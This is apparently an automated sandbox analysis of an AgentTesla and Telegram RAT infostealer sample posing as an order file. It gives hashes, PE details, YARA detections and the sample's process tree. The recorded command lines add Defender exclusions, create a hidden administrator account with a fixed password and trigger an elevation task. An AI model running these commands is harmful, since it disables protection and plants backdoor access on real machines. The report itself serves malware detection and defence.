                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053245..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053245..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053627.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.qPOtysNN.20220114053246.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.377594983509322
                              Encrypted:false
                              SSDEEP:96:BZij2NSqDo1ZMFZ5j2NSqDo1ZjqjA0cA0cA0reZVH:hccl
                              MD5:9B6113ADDFA0768FF34C25E0B1CB1532
                              SHA1:76048CA9695F3E41A457017B082C3B2A3EF36DB6
                              SHA-256:26D14F2938E1D6120DDD49F3A9CC599CFB1BD661841643D108AFE088798B0FF1
                              SHA-512:F2399B022F77E04FAD48BF84D4745ABBEC4E9608B3BD04C651901F90F4B046FB3C60246D725A0B30392DAA58B8FFE3949B52253C5A7E9AB1595C78E596ABC51E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053248..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053557..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):844800
                              Entropy (8bit):7.921306694709134
                              Encrypted:false
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              MD5:8B974D65BF7E334D75F57027821AC628
                              SHA1:F3CCC2D15A771715E6653D470F955F7095E3CD17
                              SHA-256:C2628ACD6B807FACD37A0B0DB1068F80FA2C87702D6A687445A9EC1DC3BC2421
                              SHA-512:668DDAED399D33F32C4BDCCB22D77E9EDF27A707BE8F0901417D566125D30D90BD44E039B03548C9C31D17297BCD2CC3AB5D712CBD918B71EAB1B53CFDA70E11
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 19%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`.....................................J........|................... ..........8............................................ ............... ..H............text....`... ...b.................. ..`.rsrc....|.......~...d..............@..@.reloc....... ......................@..@........................H........X..T)......k...h................................................*V!..H.....s.........*J.(.....(....}....*Z..{"....X}".....}....*n.{(...-...s)...}(....{(...*b.{"...-...($...*..}....*b.{"...-...('...*..}....*..{....o....,...(4...*.{.......%..5...s6.....g...o!...&*..{....o....,..(7....1".(8...*.{.......%..9...s:...o;...&*.r...ps<....#...r...ps<....%....s=....&...*..(>...*..(>....s....}.....{.....}.....{.....} ...*Z.{....-..*.{....{....*N.(.....{.....}....*Z.{....-..*.{

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.921306694709134
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:#NEW ORDER FOR JANUARY 2022.exe
                              File size:844800
                              MD5:8b974d65bf7e334d75f57027821ac628
                              SHA1:f3ccc2d15a771715e6653d470f955f7095e3cd17
                              SHA256:c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
                              SHA512:668ddaed399d33f32c4bdccb22d77e9edf27a707be8f0901417d566125d30d90bd44e039b03548c9c31d17297bcd2cc3ab5d712cbd918b71eab1b53cfda70e11
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`................................

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4c8089
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                              Time Stamp:0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc7f800x4a.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x7cf2.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xc7fca0x38.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xc608f0xc6200False0.937400187303data7.93856030024IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc0xca0000x7cf20x7e00False0.498387896825data6.40175519141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd20000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              IBC0xca0c40x7736data
                              RT_VERSION0xd17fc0x4f6data

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Version Infos

                              DescriptionData
                              Translation0x0000 0x04b0
                              LegalCopyright Microsoft Corporation. All rights reserved.
                              Assembly Version16.0.0.0
                              InternalNameMicrosoft.VisualStudio.Language.Intellisense.dll
                              FileVersion16.6.255.35071
                              CompanyNameMicrosoft Corporation
                              LegalTrademarks
                              CommentsMicrosoft Visual Studio Editor Platform
                              ProductNameMicrosoft Visual Studio
                              ProductVersion16.6.255+ff88cb6b00.RR
                              FileDescriptionMicrosoft.VisualStudio.Language.Intellisense
                              OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dll

                              Network Behavior

                              Network Port Distribution

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 14, 2022 05:34:59.250521898 CET5653453192.168.2.48.8.8.8
                              Jan 14, 2022 05:34:59.269767046 CET53565348.8.8.8192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jan 14, 2022 05:34:59.250521898 CET192.168.2.48.8.8.80x8a6bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jan 14, 2022 05:34:59.269767046 CET8.8.8.8192.168.2.40x8a6bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: #NEW ORDER FOR JANUARY 2022.exe PID: 6588 Parent PID: 5188

                              General

                              Start time:05:32:26
                              Start date:14/01/2022
                              Path:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              Imagebase:0xdf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              Analysis Process: powershell.exe PID: 6684 Parent PID: 6588

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Analysis Process: conhost.exe PID: 1744 Parent PID: 6684

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: net.exe PID: 3604 Parent PID: 6588

                              General

                              Start time:05:32:31
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: conhost.exe PID: 4780 Parent PID: 3604

                              General

                              Start time:05:32:32
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: net1.exe PID: 5692 Parent PID: 3604

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: net.exe PID: 5664 Parent PID: 6588

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: conhost.exe PID: 5956 Parent PID: 5664

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: net1.exe PID: 5344 Parent PID: 5664

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: net.exe PID: 6868 Parent PID: 6588

                              General

                              Start time:05:32:35
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup users "user" /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: conhost.exe PID: 5952 Parent PID: 6868

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: net1.exe PID: 4864 Parent PID: 6868

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup users "user" /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: net.exe PID: 6908 Parent PID: 6588

                              General

                              Start time:05:32:37
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators "user" /del
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: conhost.exe PID: 2628 Parent PID: 6908

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: net1.exe PID: 7040 Parent PID: 6908

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators "user" /del
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: svchost.exe PID: 7136 Parent PID: 568

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: schtasks.exe PID: 6240 Parent PID: 6588

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              Imagebase:0x10a0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: conhost.exe PID: 5460 Parent PID: 6240

                              General

                              Start time:05:32:40
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: powershell.exe PID: 7056 Parent PID: 6588

                              General

                              Start time:05:32:41
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Analysis Process: powershell.exe PID: 7060 Parent PID: 6588

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Analysis Process: conhost.exe PID: 6964 Parent PID: 7056

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: conhost.exe PID: 1556 Parent PID: 7060

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: powershell.exe PID: 1472 Parent PID: 6588

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Analysis Process: conhost.exe PID: 4672 Parent PID: 1472

                              General

                              Start time:05:32:44
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: ComSvcConfig.exe PID: 4564 Parent PID: 6588

                              General

                              Start time:05:32:51
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Imagebase:0x1823aae0000
                              File size:173672 bytes
                              MD5 hash:2778AE0EB674B74FF8028BF4E51F1DF5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: aspnet_regbrowsers.exe PID: 7068 Parent PID: 6588

                              General

                              Start time:05:32:53
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xfd0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
